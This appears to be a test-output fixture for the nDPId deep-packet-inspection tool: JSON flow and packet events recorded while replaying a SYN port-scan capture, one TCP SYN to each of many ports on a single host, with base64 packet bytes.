-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsgTgAADcGkDqsEAAIQA2GNIzSArzdUoMYAAAAAGACEAAl0wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAs5cUAADMGL62sEAAIQA2GNIzSFXzdUoMYAAAAAGACEAATEwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAshYIAADMGj\/CsEAAIQA2GNIzSgA3dUoMYAAAAAGACEACogQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsj7IAADkGf8CsEAAIQA2GNIzTBDzdU4MZAAAAAGACCAAsUAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsoJUAACkGft2sEAAIQA2GNIzTFEbdU4MZAAAAAGACCAAcRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAscMAAAC8GqLKsEAAIQA2GNIzTGoTdU4MZAAAAAGACEAAOCAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsna4AAC0GfcSsEAAIQA2GNIzTH23dU4MZAAAAAGACCAARHwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsUPgAADsGvHqsEAAIQA2GNIzTFTfdU4MZAAAAAGACEAATVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsylkAACUGWRmsEAAIQA2GNIzTD2ndU4MZAAAAAGACCAAhIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsiKIAACsGlNCsEAAIQA2GNIzTLr\/dU4MZAAAAAGACEAD5zAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0AAADoGRzKsEAAIQA2GNIzTIGzdU4MZAAAAAGACDAAMIAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMQAADQGS66sEAAIQA2GNIzTw0\/dU4MZAAAAAGACBABxPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsS0MAADgGxS+sEAAIQA2GNIzTBJ\/dU4MZAAAAAGACBAAv7QAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAslLUAACwGh72sEAAIQA2GNIzTrJDdU4MZAAAAAGACBACH+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAs7LUAACsGML2sEAAIQA2GNIzSFF7dUoMYAAAAAGACEAAUMQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVm4AADkGuQSsEAAIQA2GNIzSABHdUoMYAAAAAGACCAAwfgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsYdQAACsGu56sEAAIQA2GNIzSGivdUoMYAAAAAGACEAAOZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GMAADEGIw+sEAAIQA2GNIzSDubdUoMYAAAAAGACCAAhqQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtkAADYG85msEAAIQA2GNIzSX3zdUoMYAAAAAGACDADNEgAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAslyIAACUGjFCsEAAIQA2GNIzSABrdUoMYAAAAAGACCAAwdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVt0AADIGv5WsEAAIQA2GNIzSDSndUoMYAAAAAGACDAAfZgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/FUAADMGGR2sEAAIQA2GNIzSCU7dUoMYAAAAAGACEAAfQQAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsoxcAACkGfFusEAAIQA2GNIzSAprdUoMYAAAAAGACCAAt9QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtAAADkG0KKsEAAIQA2GNIzSBNzdUoMYAAAAAGACCAArswAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDHcAADUGBvysEAAIQA2GNIzSC+zdUoMYAAAAAGACCAAkowAAAgQFtA=="} 
